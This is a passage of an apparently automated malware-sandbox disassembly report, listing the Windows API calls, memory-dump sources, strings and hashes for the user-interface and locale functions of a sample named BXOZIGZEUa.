                                                                • Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504
                                                              • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 004D95C8
                                                              • _memset.LIBCMT ref: 004D95F4
                                                              • _wcstoul.LIBCMT ref: 004D963C
                                                                • Part of subcall function 005CF54B: wcstoxl.LIBCMT ref: 005CF55B
                                                              • _wcslen.LIBCMT ref: 004D965D
                                                                • Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629
                                                              • GetUserDefaultUILanguage.KERNEL32 ref: 004D966D
                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 004D9694
                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 004D96A3
                                                              • GetSystemDefaultUILanguage.KERNEL32 ref: 004D96AC
                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 004D96C8
                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 004D96D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Default$ConvertLocale$Language$ActivateAddressProcSystemUser__getptd_noexit_memset_wcslen_wcstoulwcstoxl
                                                              • String ID: GetThreadPreferredUILanguages$KERNEL32.DLL$e
                                                              • API String ID: 1566020816-2285706205
                                                              • Opcode ID: ea718e47f1c3e8ce59635c06299aec664d3fc06b898012fc25ac731f5b0d162f
                                                              • Instruction ID: 1795ba76f20b5548481f507985ce8596599e008fd52ef2e678f606562d20f0eb
                                                              • Opcode Fuzzy Hash: ea718e47f1c3e8ce59635c06299aec664d3fc06b898012fc25ac731f5b0d162f
                                                              • Instruction Fuzzy Hash: 7341A471901229ABDB20AF65DC95BEE7BB8EB54710F0104ABE509E7240DB78DE81CF54
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00526AC5
                                                              • GetClientRect.USER32(?,?), ref: 00526AFF
                                                              • GetWindowRect.USER32(?,?), ref: 00526B5A
                                                              • EqualRect.USER32(?,?), ref: 00526B68
                                                              • GetWindowRect.USER32(?,?), ref: 00526B8E
                                                                • Part of subcall function 004E701F: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 004E7045
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$AdjustClientEqual
                                                              • String ID:
                                                              • API String ID: 2779716228-0
                                                              • Opcode ID: de94a1c6e12ed5dd86d090745e8fb5b02015fa7b2002eaa06ead26bc6656ed2a
                                                              • Instruction ID: 806ec996dbc875bda110786de8bb0e7ddc3b100f43f13ec3b62ce66f328e75e9
                                                              • Opcode Fuzzy Hash: de94a1c6e12ed5dd86d090745e8fb5b02015fa7b2002eaa06ead26bc6656ed2a
                                                              • Instruction Fuzzy Hash: 4AD1E271E01229EFCF01DFE9D988AAEBBB9FF48700F14411AE505EB255DB34A941DB90
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0051EB4E
                                                              • InflateRect.USER32(?,00000000,00000000), ref: 0051EB7D
                                                              • SetRectEmpty.USER32(?), ref: 0051EC1B
                                                              • SetRectEmpty.USER32(?), ref: 0051EC24
                                                              • GetSystemMetrics.USER32(00000002), ref: 0051EC45
                                                              • KillTimer.USER32(?,00000002), ref: 0051ECDF
                                                              • EqualRect.USER32(?,?), ref: 0051ED01
                                                              • EqualRect.USER32(?,?), ref: 0051ED12
                                                              • EqualRect.USER32(?,?), ref: 0051ED63
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0051ED7C
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0051ED84
                                                              • EqualRect.USER32(?,?), ref: 0051ED98
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0051EDAB
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0051EDB3
                                                              • UpdateWindow.USER32(?), ref: 0051EDC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
                                                              • String ID:
                                                              • API String ID: 2140115980-0
                                                              • Opcode ID: 16c1deece68caf24e263e306b5724c9cc191f097e7814f0684a2fb74cc1cb2b8
                                                              • Instruction ID: 65a551f01aaa91e0b1058f9c3d31dd0309fd422d0d7f4605cd1dda86ecff6aea
                                                              • Opcode Fuzzy Hash: 16c1deece68caf24e263e306b5724c9cc191f097e7814f0684a2fb74cc1cb2b8
                                                              • Instruction Fuzzy Hash: 9F91F47190021A9FDF11DFA4C984AEE7BB5BF08300F1445B9EC06EB255DBB1A985CFA0
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00516109
                                                                • Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88
                                                                • Part of subcall function 0059FF85: __EH_prolog3.LIBCMT ref: 0059FF8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_malloc
                                                              • String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
                                                              • API String ID: 1683881009-2110171958
                                                              • Opcode ID: 3a40eb56d29e94b0ecfbaa94f735d9770e4bb1f5554b04ca4fbd4591fa3fb855
                                                              • Instruction ID: fd3c3b466c8035383f6789e8f1556e4e13828ee8c23e9dd2eb6bb0e9eac76536
                                                              • Opcode Fuzzy Hash: 3a40eb56d29e94b0ecfbaa94f735d9770e4bb1f5554b04ca4fbd4591fa3fb855
                                                              • Instruction Fuzzy Hash: 20519120A04245DAEF18EB7998636FD6FA27F14B04F14481FF52AD72C2EF744B81865B
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Object_memmove
                                                              • String ID: $TR`
                                                              • API String ID: 107514201-2251896978
                                                              • Opcode ID: 124271e068881f3f1c0dd698b72e7fc82415d53806fd5fadceb35b5f4afea655
                                                              • Instruction ID: 56c24973c6be6ab183dc4c087647236e7d0cfa40f81a54bf2e11c0ebcae8da24
                                                              • Opcode Fuzzy Hash: 124271e068881f3f1c0dd698b72e7fc82415d53806fd5fadceb35b5f4afea655
                                                              • Instruction Fuzzy Hash: 3A413571C00219AFCF15EFA5DC919AEBFB5FF54304B10802AE512A72A0DB749E45DFA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Capture$ClientRectScreen$AsyncCursorParentReleaseStateWindow
                                                              • String ID: c
                                                              • API String ID: 3949579999-2927717585
                                                              • Opcode ID: 9833fb3d2652116b19ecf0cb97ffefb4d43cd0a2218cc4e88784468d0da3eb90
                                                              • Instruction ID: 31b00d5ce0ec4bf38fadce8fe33f2459d1b6118d4e2faf3aa4cfc8c752efe6da
                                                              • Opcode Fuzzy Hash: 9833fb3d2652116b19ecf0cb97ffefb4d43cd0a2218cc4e88784468d0da3eb90
                                                              • Instruction Fuzzy Hash: B1714D75A00205AFDF11DFA4C889BEE7FB5FF49300F1440AAED05AB296CB359944CB61
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0054D43D
                                                                • Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2
                                                              • GetWindowRect.USER32(?,?), ref: 0054D508
                                                                • Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA
                                                                • Part of subcall function 0054CAE8: GetWindowRect.USER32(?,?), ref: 0054CAF8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3RectWindow$Ctrl
                                                              • String ID: %sPane-%d$%sPane-%d%x$IsFloating$MRUWidth$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
                                                              • API String ID: 2598721110-1120251949
                                                              • Opcode ID: 3fc23df7341ef8073dc60accf12c562d2ff4090aaa31bcbde4ba17cefa39f3d9
                                                              • Instruction ID: 396356b2b95e30dfb9c67f4ca9c0954eb32e7e7e6c0754f2c95c074dae9dd41d
                                                              • Opcode Fuzzy Hash: 3fc23df7341ef8073dc60accf12c562d2ff4090aaa31bcbde4ba17cefa39f3d9
                                                              • Instruction Fuzzy Hash: C3516931600605EFCF15AFA4C899AFEBBB2BF48314F10451EF9169B2A1DB359910DF61
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00522CFA
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00522D33
                                                              • GetMonitorInfoW.USER32(00000000), ref: 00522D3A
                                                              • CopyRect.USER32(?,?), ref: 00522D52
                                                              • CopyRect.USER32(?,?), ref: 00522D5C
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00522D93
                                                              • GetSystemMetrics.USER32(00000022), ref: 00522E11
                                                              • GetSystemMetrics.USER32(00000023), ref: 00522E18
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: RectSystem$CopyInfoMetricsMonitor$Exception@8FromH_prolog3ParametersPointThrowWindow
                                                              • String ID: "9R$"9R$(
                                                              • API String ID: 348238172-1706832302
                                                              • Opcode ID: 4951e44fa0b4019207b8029bde487d0d51b31fa43d0c95622cf139d19eeba796
                                                              • Instruction ID: 9330f701bb931aea55349ff1f5e6eca84c3a2a8c74997dda4f62c05a078ce93d
                                                              • Opcode Fuzzy Hash: 4951e44fa0b4019207b8029bde487d0d51b31fa43d0c95622cf139d19eeba796
                                                              • Instruction Fuzzy Hash: 7A512AB5E00219AFCB14DFA9D985AEEBBF9FF88300F14452AE505E7254D734AA05CF60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$IntersectObjectSelect$Stretch
                                                              • String ID:
                                                              • API String ID: 401711590-0
                                                              • Opcode ID: 804e06e325d92981169ccebc3566dc7d3e2ceb5a1eb81d38aca4caaf75fcb70b
                                                              • Instruction ID: 7847327e2ca8d1eab22aad26dda97e1e3448786206208d8e17d1177856891291
                                                              • Opcode Fuzzy Hash: 804e06e325d92981169ccebc3566dc7d3e2ceb5a1eb81d38aca4caaf75fcb70b
                                                              • Instruction Fuzzy Hash: 8CC1B17290010AAFCF05CFA8C984AEEBBB9FF49358B155619F815E7214DB34E945CF50
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005461C4
                                                              • TransparentBlt.MSIMG32(00000000,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,000000FF,00000048,00546DED,00000000,?,?), ref: 0054621C
                                                              • CreateCompatibleDC.GDI32(?), ref: 00546261
                                                              • CreateCompatibleDC.GDI32(?), ref: 0054627E
                                                              • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0054629C
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00546300
                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00CC0020), ref: 0054632E
                                                              • CreateBitmap.GDI32(00000000,00000000,00000001,00000001,00000000), ref: 0054633B
                                                              • BitBlt.GDI32(005080B9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 00546374
                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,005080B9,00000000,00000000,008800C6), ref: 005463A2
                                                              • BitBlt.GDI32(?,?,00000000,00000000,00000000,005080B9,00000000,00000000,008800C6), ref: 005463CF
                                                              • BitBlt.GDI32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00EE0086), ref: 005463EA
                                                                • Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99
                                                                • Part of subcall function 004E0389: DeleteDC.GDI32(00000000), ref: 004E039B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Create$Compatible$Bitmap$DeleteH_prolog3H_prolog3_catch_StretchTransparent
                                                              • String ID:
                                                              • API String ID: 650092443-0
                                                              • Opcode ID: 44fb104d723b83f7ccd9041471593eb5a89c9614246bc574810909877aef582c
                                                              • Instruction ID: 2d658169b588b053a7f69f8e28830ec9784dc18ffa25cb401439ffe660c150d3
                                                              • Opcode Fuzzy Hash: 44fb104d723b83f7ccd9041471593eb5a89c9614246bc574810909877aef582c
                                                              • Instruction Fuzzy Hash: 6B910F71800149AFCF02EFA1CD81EEEBF76BF18348F244529F915A2161CB759E64EB61
                                                              APIs
                                                                • Part of subcall function 0052C61A: LoadCursorW.USER32(00000000,00007F8B), ref: 0052C63B
                                                                • Part of subcall function 0052C61A: LoadCursorW.USER32(?,00007901), ref: 0052C654
                                                              • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 0052C9CA
                                                              • PostMessageW.USER32(?,00000111,0000E145,00000000), ref: 0052CA2D
                                                              • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 0052CA4F
                                                              • GetCursorPos.USER32(?), ref: 0052CA6A
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0052CA96
                                                              • ReleaseCapture.USER32 ref: 0052CAE3
                                                              • SetCapture.USER32(?), ref: 0052CAE8
                                                              • ReleaseCapture.USER32 ref: 0052CAF4
                                                              • SendMessageW.USER32(?,00000362,?,00000000), ref: 0052CB08
                                                              • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 0052CB33
                                                              • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 0052CB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                                              • String ID:
                                                              • API String ID: 291007519-0
                                                              • Opcode ID: 194e9f901575b263eddd9f9153e84baefe9e683f39a95b77cb82f9e87a09e970
                                                              • Instruction ID: 228783e8ead6777dad38275a5c100d1833b1f7731f967d2b2fad52a49490c7eb
                                                              • Opcode Fuzzy Hash: 194e9f901575b263eddd9f9153e84baefe9e683f39a95b77cb82f9e87a09e970
                                                              • Instruction Fuzzy Hash: E2517C71A00208AFCB21AFA0DC89ABEBFB9FF45344F508469E146E71A2DB719D44DB10
                                                              APIs
                                                              • GetKeyState.USER32(00000011), ref: 0050F1DC
                                                              • GetWindowRect.USER32(?,?), ref: 0050F244
                                                              • GetCursorPos.USER32(?), ref: 0050F28E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CursorRectStateWindow
                                                              • String ID: c
                                                              • API String ID: 3412758350-2927717585
                                                              • Opcode ID: 8844ffedd837f43c810f7f80b2f159b76051dfb129162fdb5c1257ba943bb6f5
                                                              • Instruction ID: 9149b3ce714639682dcfc9bdab2208a8f3df61c130fadc6b7c797e6aaa75e672
                                                              • Opcode Fuzzy Hash: 8844ffedd837f43c810f7f80b2f159b76051dfb129162fdb5c1257ba943bb6f5
                                                              • Instruction Fuzzy Hash: 2BB1E470A00205AFCF20DFA5D888AEEBBF6FF48314F14447EE946A7691DB309940CB65
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00531061
                                                              • GetSystemMenu.USER32(?,00000000,00000214,004F3060,00000000,00000000,00000001,?), ref: 005310C3
                                                              • IsMenu.USER32(?), ref: 005310DC
                                                              • IsMenu.USER32(?), ref: 005310F6
                                                              • SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0053112B
                                                              • GetClassLongW.USER32(?,000000DE), ref: 00531141
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0053118C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Long$ClassH_prolog3_MessageSendSystemWindow
                                                              • String ID: 0
                                                              • API String ID: 859179710-4108050209
                                                              • Opcode ID: d0ab2a0d06e7a4cf086ec172c2b09b78b5ee728735bc836440fb60caf00d2033
                                                              • Instruction ID: bd9f7677e2aaa55f7b76a65f6a9285c364b438f9ccfea9a9e55a1133337b26de
                                                              • Opcode Fuzzy Hash: d0ab2a0d06e7a4cf086ec172c2b09b78b5ee728735bc836440fb60caf00d2033
                                                              • Instruction Fuzzy Hash: 55816F30500B45DFDB21DF65CC89BEEBBB8FF44701F24466AE8AA96291DB305A85CF44
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0054D2A2
                                                                • Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2
